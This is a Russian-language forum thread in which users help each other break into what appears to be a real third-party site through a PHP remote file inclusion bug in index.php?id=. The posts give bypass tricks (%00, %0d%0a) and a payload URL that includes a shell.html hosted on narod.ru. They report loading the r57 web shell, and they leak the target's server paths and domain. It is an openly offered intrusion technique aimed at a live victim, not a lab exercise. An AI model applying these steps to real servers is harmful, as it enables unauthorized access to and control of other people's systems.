Есть бажный похоже самодельный форум, пропускает и парсит хтмл в ссылках вида index.php?id=
Есть идеи как туда можно шел залить?

PS Подставляет .html после введеного, так что на внешнюю завести нельзя

Спасибо

Подставляет .html после введеного, так что на внешнюю завести нельзя
%00 не помогает? Или же %0d%0a?

Помогает - ставит пробел, но что с этим можно сделать?
Вот что выдает
Warning: main( .htm): failed to open stream: No such file or directory in /hsphere/local/home/asvideor/XXX/index.php on line 241 Warning: main( .htm): failed to open stream: No such file or directory in /hsphere/local/home/asvideor/XXX/index.php on line 241 Warning: main(): Failed opening ' .htm' for inclusion (include_path='.:/hsphere/shared/apache/libexec/php4ext/php/') in /hsphere/local/home/asvideor/va-utair.ru/index.php on line 241

Подставляет .html после введеного, так что на внешнюю завести нельзя
Почему нельзя? Залей на народ shell.html и подставляй тогда

index.php?id=http://www.site.narod.ru/shell

Почему нельзя? Залей на народ shell.html и подставляй тогда

index.php?id=http://www.site.narod.ru/shell


Получилось открыть внешний файл через такую конструкцию:

index.php?id=внешняя_ссылка/%0d%0a

Но файл-же не заливается на их фтп, я вижу через r57 содержимое моего сервака...

а как насчёт ссылочки на форум ?
Если не хочеш выкладывать ссылу в паблик пришли в приват, как у мя будет время покапаюсь...

шелл должен быть залит там, где нет поддержки php, например на народ.ру

шелл должен быть залит там, где нет поддержки php, например на народ.ру

Да не фсегда, можно и в *.txt формате шелл на сервере хранить, но это только если этот txt будет запускаца инклудом